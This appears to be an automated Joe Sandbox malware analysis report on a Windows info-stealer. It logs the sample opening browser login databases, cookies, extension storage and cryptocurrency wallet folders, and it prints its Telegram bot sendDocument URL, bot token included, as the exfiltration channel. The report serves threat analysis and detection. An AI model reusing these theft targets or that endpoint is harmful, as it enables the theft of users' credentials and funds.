          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\881ae04a-fa90-4a62-8eee-5ae000467040\Login Data
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Login Data
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\b79425d0-2f84-41d2-84d3-9f598259534d\Login Data
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fdjamakpfbbddfjaooikfcpapjohcfmg
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\af2cf244-1bda-453b-baae-9793e72e9be8\Login Data
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir\Login Data
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\Login Data
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\697416b8-55c0-41ac-9636-a06aa38f99e9\Login Data
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\1dcaa933-a69d-41cc-acb5-708980d119e5\Login Data
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db\Login Data
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\e9edf720-d88f-46ea-8d95-7134a339b3c1\Login Data
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\Login Data
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB\Login Data
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage\Login Data
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\Login Data
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Login Data
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\Login Data
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\kz8kl7vh.default\cookies.sqlite
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\admmjipmmciaobhojoghlmleefbicajg
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache\Login Data
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jhfjfclepacoldmjmkmdlmganfaalklb
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\icmkfkmjoklfhlfdkkkgpnpldkgdmhoe
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\Login Data
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB\Login Data
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fooolghllnmhmmndgjiamiiodkpenpbb
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\chgfefjpcobfbnpmiokfjjaglahmnded
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pnlccmojcmeohlpggmfnbbiapkmbliob
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Roaming\exodus\exodus.wallet\
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
          Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\

          Remote Access Functionality

          Source: Yara match, file source: 765iYbgWn9.exe, type: SAMPLE
          Source: Yara match, file source: sslproxydump.pcap, type: PCAP
          Source: Yara match, file source: 0.0.765iYbgWn9.exe.7ff62f040000.0.unpack, type: UNPACKEDPE
          Source: Yara match, file source: Process Memory Space: 765iYbgWn9.exe PID: 7552, type: MEMORYSTR
          MITRE ATT&CK Matrix (techniques listed per tactic column; the number in parentheses is the badge shown next to that technique in the report)

          Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
          Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
          Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
          Execution: Windows Management Instrumentation (31); Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers
          Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
          Privilege Escalation: Process Injection (11); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
          Defense Evasion: Masquerading (1); Disable or Modify Tools (1); Virtualization/Sandbox Evasion (31); Process Injection (11); DLL Side-Loading (1); Steganography; Compile After Delivery
          Credential Access: OS Credential Dumping (1); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
          Discovery: Security Software Discovery (21); Process Discovery (1); Virtualization/Sandbox Evasion (31); Application Window Discovery (1); System Network Configuration Discovery (1); File and Directory Discovery (1); System Information Discovery (22)
          Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
          Collection: Data from Local System (2); Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
          Command and Control: Web Service (1); Encrypted Channel (1); Ingress Tool Transfer (1); Non-Application Layer Protocol (3); Application Layer Protocol (4); Multiband Communication; Commonly Used Port
          Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
          Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery
Source | Detection | Scanner | Label | Link
765iYbgWn9.exe | 50% | ReversingLabs | Win64.Trojan.Barys |
765iYbgWn9.exe | 32% | Virustotal | | Browse
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label | Link
ipwho.is | 0% | Virustotal | | Browse
api.telegram.org | 2% | Virustotal | | Browse
Source | Detection | Scanner | Label | Link
https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe |
https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe |
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe |
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe |
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe |
https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe |
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe |
https://duckduckgo.com/chrome_newtab | 0% | Avira URL Cloud | safe |
https://duckduckgo.com/ac/?q= | 0% | Avira URL Cloud | safe |
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | 0% | Virustotal | | Browse
https://duckduckgo.com/ac/?q= | 0% | Virustotal | | Browse
https://duckduckgo.com/chrome_newtab | 0% | Virustotal | | Browse
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | 0% | Avira URL Cloud | safe |
https://api.telegram.org/bot6082381502:AAFgFkge53k6kBZcTN8CBICiZV-VphQ1WgA/sendDocument?chat_id=5795 | 0% | Avira URL Cloud | safe |
http://www.w3.or | 0% | Avira URL Cloud | safe |
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | Avira URL Cloud | safe |
https://docs.rs/getrandom#nodejs-es-module-supportC: | 0% | Avira URL Cloud | safe |
http://ns.adobe. | 0% | Avira URL Cloud | safe |
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | Virustotal | | Browse
https://docs.rs/getrandom#nodejs-es-module-supportC: | 0% | Virustotal | | Browse
Name | IP | Active | Malicious | Antivirus Detection | Reputation
ipwho.is | 195.201.57.90 | true | false | | unknown
api.telegram.org | 149.154.167.220 | true | true | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://ac.ecosia.org/autocomplete?q= | 765iYbgWn9.exe, 00000000.00000003.1886356574.00000270FCA98000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe; URL Reputation: safe | unknown
https://duckduckgo.com/chrome_newtab | 765iYbgWn9.exe, 00000000.00000003.1886356574.00000270FCA98000.00000004.00000020.00020000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://duckduckgo.com/ac/?q= | 765iYbgWn9.exe, 00000000.00000003.1886356574.00000270FCA98000.00000004.00000020.00020000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | 765iYbgWn9.exe, 00000000.00000003.1886356574.00000270FCA98000.00000004.00000020.00020000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 765iYbgWn9.exe, 00000000.00000003.1886356574.00000270FCA98000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe; URL Reputation: safe | unknown
https://api.telegram.org/bot6082381502:AAFgFkge53k6kBZcTN8CBICiZV-VphQ1WgA/sendDocument?chat_id=5795 | 765iYbgWn9.exe, 00000000.00000003.1963664259.00000270FAD21000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.1963812730.00000270FCA20000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.w3.or | 765iYbgWn9.exe | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 765iYbgWn9.exe, 00000000.00000003.1886356574.00000270FCA98000.00000004.00000020.00020000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://docs.rs/getrandom#nodejs-es-module-supportC: | 765iYbgWn9.exe | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 765iYbgWn9.exe, 00000000.00000003.1886356574.00000270FCA98000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://ns.adobe. | 765iYbgWn9.exe | false | Avira URL Cloud: safe | unknown
https://www.ecosia.org/newtab/ | 765iYbgWn9.exe, 00000000.00000003.1886356574.00000270FCA98000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 765iYbgWn9.exe, 00000000.00000003.1886356574.00000270FCA98000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | true
195.201.57.90 | ipwho.is | Germany | 24940 | HETZNER-ASDE | false
          Joe Sandbox version:40.0.0 Tourmaline
          Analysis ID:1483815
          Start date and time:2024-07-29 07:37:05 +02:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 6m 7s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
          Run name:Run with higher sleep bypass
Number of new started processes analysed:11
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample name:765iYbgWn9.exe
          renamed because original name is a hash value
          Original Sample Name:0534ab10184891cd61d262bfd79b7b4c.exe
          Detection:MAL
          Classification:mal72.troj.spyw.winEXE@4/15@3/2
          EGA Information:Failed
          HCA Information:
          • Successful, ratio: 100%
          • Number of executed functions: 0
          • Number of non-executed functions: 0
          Cookbook Comments:
          • Found application associated with file extension: .exe
          • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, 6.0.1.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.7.0.0.0.0.3.0.1.3.0.6.2.ip6.arpa, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
          • Report size getting too big, too many NtOpenFile calls found.
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
          No simulations
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
149.154.167.220 | WfKynArKjH.exe | Get hash | malicious | AsyncRAT, Luca Stealer, MicroClip, RedLine | Browse |
149.154.167.220 | https://bming.cl/readm.html?colors=bWljaGFlbC5jaHVAbGNhdHRlcnRvbi5jb20= | Get hash | malicious | Unknown | Browse |
149.154.167.220 | lHqcAkPNu8.exe | Get hash | malicious | XWorm | Browse |
149.154.167.220 | file.exe | Get hash | malicious | Clipboard Hijacker | Browse |
149.154.167.220 | Nursultan Alpha Client.exe | Get hash | malicious | DCRat, XWorm | Browse |
149.154.167.220 | Easy Anti-Cheat Analyzer.exe | Get hash | malicious | DCRat, XWorm | Browse |
149.154.167.220 | encrypthub_steal.ps1 | Get hash | malicious | Unknown | Browse |
149.154.167.220 | encrypthub_steal.ps1 | Get hash | malicious | Unknown | Browse |
149.154.167.220 | QUOTATION_JULQTRA071244#U00b7PDF.scr.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
195.201.57.90 | WfKynArKjH.exe | Get hash | malicious | AsyncRAT, Luca Stealer, MicroClip, RedLine | Browse | /?output=json
195.201.57.90 | ubes6SC7Vd.exe | Get hash | malicious | Unknown | Browse | ipwhois.app/xml/
195.201.57.90 | cOQD62FceM.exe | Get hash | malicious | Luca Stealer, Rusty Stealer | Browse | /?output=json
195.201.57.90 | Clipper.exe | Get hash | malicious | Unknown | Browse | /?output=json
195.201.57.90 | cOQD62FceM.exe | Get hash | malicious | Luca Stealer | Browse | /?output=json
195.201.57.90 | Cryptor.exe | Get hash | malicious | Luca Stealer | Browse | /?output=json
195.201.57.90 | Cryptor.exe | Get hash | malicious | Luca Stealer, Rusty Stealer | Browse | /?output=json
195.201.57.90 | rust-stealer-xss.exe | Get hash | malicious | Discord Token Stealer, Luca Stealer | Browse | /?output=json
195.201.57.90 | Build.exe | Get hash | malicious | Luca Stealer, Quasar | Browse | /?output=json
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
ipwho.is | WfKynArKjH.exe | Get hash | malicious | AsyncRAT, Luca Stealer, MicroClip, RedLine | Browse | 195.201.57.90
ipwho.is | 1d686b05f745875e28939abe357baedd169b59f5a0d88.exe | Get hash | malicious | Quasar | Browse | 195.201.57.90
ipwho.is | http://appinforyvjhf6454ms1a.pages.dev/ | Get hash | malicious | TechSupportScam | Browse | 195.201.57.90
ipwho.is | https://l.facebook.com/l.php?u=https%3A%2F%2Fnutramart.store%2F%3Flabel%3D5efe465a4dbe59fbb290a966697fc1cd%26utm_medium%3Dpaid%26utm_source%3Dfb%26utm_id%3D6599688580361%26utm_content%3D6599688599961%26utm_term%3D6599688590961%26utm_campaign%3D6599688580361%26fbclid%3DIwZXh0bgNhZW0BMAABHdzmJULh8TsQt3pW_qnmIXPFdqLqBaBKW5T-aZYxDkCqac1lwtitUH-fNw_aem_UoCoKjZX08yMSHQS1Rk-lA&h=AT2Rbdo290L85DwdtmvCHSaYZeZQw6zVRZwOCmLUor4sXK9slv2_8Xz3sNHtiR9yk_5i3WV0TyI-vvISy2qX4eX89xJtn5joKswTFrWNikf-8BbcY1c3OSbcsV7ioNYHeRE&__tn__=%2CmH-R&c%5B0%5D=AT1zpbOywPCbT61x3IUZxcKH5NMmiyOktbAovmzxAnO3GQxZoE9RLlfDBYeXTFE8UxKMEzW4i7Rw_yO3qxx7WfbLZEKXf2a_gqDGEIqK5xACO326D8DwbL9YKGpFirOaXzMC_oPb4wgEghT5w108ehD0lVOUa18OX2Yna4VvaAaIUpPjAkk9gOhJw0AtcNc8dmXxzoPXiUwIYEI1VCwKUmK1G_lmEdu24Iq9UJ_ic75uGIJuxQwEttfLYZ0HqkC3D8EpDSqIjHE7T12pe_syL5VjKXEGR6hZ3F-YEVJbiZGhU5diMWZAvsPL2bUpvSMNWrEu14yqnXQK7Z-1xnZRSbLWmzHp53sdCj21 | Get hash | malicious | Unknown | Browse | 195.201.57.90
ipwho.is | Q2XwE8NRLx.exe | Get hash | malicious | Quasar | Browse | 195.201.57.90
ipwho.is | https://kohojoiy.pages.dev/ | Get hash | malicious | TechSupportScam | Browse | 195.201.57.90
ipwho.is | http://ofclgtaiopoi.z13.web.core.windows.net | Get hash | malicious | TechSupportScam | Browse | 195.201.57.90
ipwho.is | http://ofclgtaiopoi.z13.web.core.windows.net | Get hash | malicious | TechSupportScam | Browse | 195.201.57.90
ipwho.is | dzCvoZ0uLj.exe | Get hash | malicious | Quasar | Browse | 195.201.57.90
api.telegram.org | WfKynArKjH.exe | Get hash | malicious | AsyncRAT, Luca Stealer, MicroClip, RedLine | Browse | 149.154.167.220
api.telegram.org | https://bming.cl/readm.html?colors=bWljaGFlbC5jaHVAbGNhdHRlcnRvbi5jb20= | Get hash | malicious | Unknown | Browse | 149.154.167.220
api.telegram.org | lHqcAkPNu8.exe | Get hash | malicious | XWorm | Browse | 149.154.167.220
api.telegram.org | file.exe | Get hash | malicious | Clipboard Hijacker | Browse | 149.154.167.220
api.telegram.org | Nursultan Alpha Client.exe | Get hash | malicious | DCRat, XWorm | Browse | 149.154.167.220
api.telegram.org | Easy Anti-Cheat Analyzer.exe | Get hash | malicious | DCRat, XWorm | Browse | 149.154.167.220
api.telegram.org | encrypthub_steal.ps1 | Get hash | malicious | Unknown | Browse | 149.154.167.220
api.telegram.org | encrypthub_steal.ps1 | Get hash | malicious | Unknown | Browse | 149.154.167.220
api.telegram.org | file.exe | Get hash | malicious | Python Stealer, Amadey, Monster Stealer, PureLog Stealer, RedLine, Stealc, Vidar | Browse | 149.154.167.220
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
TELEGRAMRU | WfKynArKjH.exe | Get hash | malicious | AsyncRAT, Luca Stealer, MicroClip, RedLine | Browse | 149.154.167.220
TELEGRAMRU | https://bming.cl/readm.html?colors=bWljaGFlbC5jaHVAbGNhdHRlcnRvbi5jb20= | Get hash | malicious | Unknown | Browse | 149.154.167.220
TELEGRAMRU | https://join-telegram.apl-my.com/virallbn/ | Get hash | malicious | Unknown | Browse | 149.154.167.99
TELEGRAMRU | lHqcAkPNu8.exe | Get hash | malicious | XWorm | Browse | 149.154.167.220
TELEGRAMRU | file.exe | Get hash | malicious | Clipboard Hijacker | Browse | 149.154.167.220
TELEGRAMRU | https://kaslasa.ru/ | Get hash | malicious | Unknown | Browse | 149.154.167.99
TELEGRAMRU | https://telegarm-com.icu/ | Get hash | malicious | Telegram Phisher | Browse | 149.154.167.99
TELEGRAMRU | Nursultan Alpha Client.exe | Get hash | malicious | DCRat, XWorm | Browse | 149.154.167.220
TELEGRAMRU | Easy Anti-Cheat Analyzer.exe | Get hash | malicious | DCRat, XWorm | Browse | 149.154.167.220
HETZNER-ASDE | WfKynArKjH.exe | Get hash | malicious | AsyncRAT, Luca Stealer, MicroClip, RedLine | Browse | 195.201.57.90
HETZNER-ASDE | 1d686b05f745875e28939abe357baedd169b59f5a0d88.exe | Get hash | malicious | Quasar | Browse | 195.201.57.90
HETZNER-ASDE | file.exe | Get hash | malicious | Vidar | Browse | 5.75.212.60
HETZNER-ASDE | SecuriteInfo.com.Win32.Evo-gen.21074.1738.exe | Get hash | malicious | SmokeLoader | Browse | 188.40.141.211
HETZNER-ASDE | mek_n_bat.bat | Get hash | malicious | Unknown | Browse | 78.47.143.65
HETZNER-ASDE | file.exe | Get hash | malicious | Vidar | Browse | 5.75.212.60
HETZNER-ASDE | 1lKbb2hF7fYToopfpmEvlyRN.exe | Get hash | malicious | LummaC, Vidar | Browse | 5.75.212.60
HETZNER-ASDE | file.exe | Get hash | malicious | Vidar | Browse | 5.75.212.60
HETZNER-ASDE | https://www.formajo.com/bestbuy/fxc/cmVhbGVtYWlsQGppbW15am9obi5jb20= | Get hash | malicious | HTMLPhisher | Browse | 88.99.142.215
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
3b5074b1b5d032e5620f69f9f700ff0e | WfKynArKjH.exe | Get hash | malicious | AsyncRAT, Luca Stealer, MicroClip, RedLine | Browse | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | http://pub-a29070233cb54ef393c1ddea471f903c.r2.dev/index.html | Get hash | malicious | Unknown | Browse | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | https://gdhddyyyu-yfdrfs-f48b55.ingress-earth.ewp.live/wp-content/plugins/ddrxmis/pages/region.php | Get hash | malicious | Unknown | Browse | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | https://metamaskuh.azurewebsites.net/ | Get hash | malicious | Unknown | Browse | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | http://pub-63ee9e97e9eb46d78c12a9137fdc4d90.r2.dev/invoice.htm | Get hash | malicious | HTMLPhisher | Browse | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | http://pub-58a4baf41c124648bdc4fe772188accd.r2.dev/index.html | Get hash | malicious | Unknown | Browse | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | http://pub-40cb77b4a6d84294bfa2db6a96f70ff7.r2.dev/index.html | Get hash | malicious | Unknown | Browse | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | http://www.capitalonebnks.com/ | Get hash | malicious | Unknown | Browse | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | http://pub-8198ef94712a43e5a05e0ea8720214fd.r2.dev/oblivionauth%5D.html | Get hash | malicious | HTMLPhisher | Browse | 149.154.167.220
                            No context
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):64
                            Entropy (8bit):0.773832331134527
                            Encrypted:false
                            SSDEEP:3:NlllulAtl:NllUAX
                            MD5:6FB656DDCC392CD101B1AD13F38D52CB
                            SHA1:2ADE827066E70D9F9126FEF8B4E88FFDC5F29C25
                            SHA-256:F3AFB3F90407560397CF3D1E841BE8C7F50F6216E3B5C0FF95186610E9658A4D
                            SHA-512:11DF425EDB51507E476AD42555FBF2E862664D07F206E4A02175AE3F9F785DA772BCFF1EBC640626ABF96AC9BAE1EB4F5BC0AE686EB3559D85D334069FC02BC5
                            Malicious:false
                            Reputation:moderate, very likely benign file
                            Preview:@...e...........................................................
                            Process:C:\Users\user\Desktop\765iYbgWn9.exe
                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                            Category:dropped
                            Size (bytes):20480
                            Entropy (8bit):0.6732424250451717
                            Encrypted:false
                            SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                            MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                            SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                            SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                            SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                            Malicious:false
                            Reputation:high, very likely benign file
                            Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Users\user\Desktop\765iYbgWn9.exe
                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                            Category:dropped
                            Size (bytes):196608
                            Entropy (8bit):1.1209886597424439
                            Encrypted:false
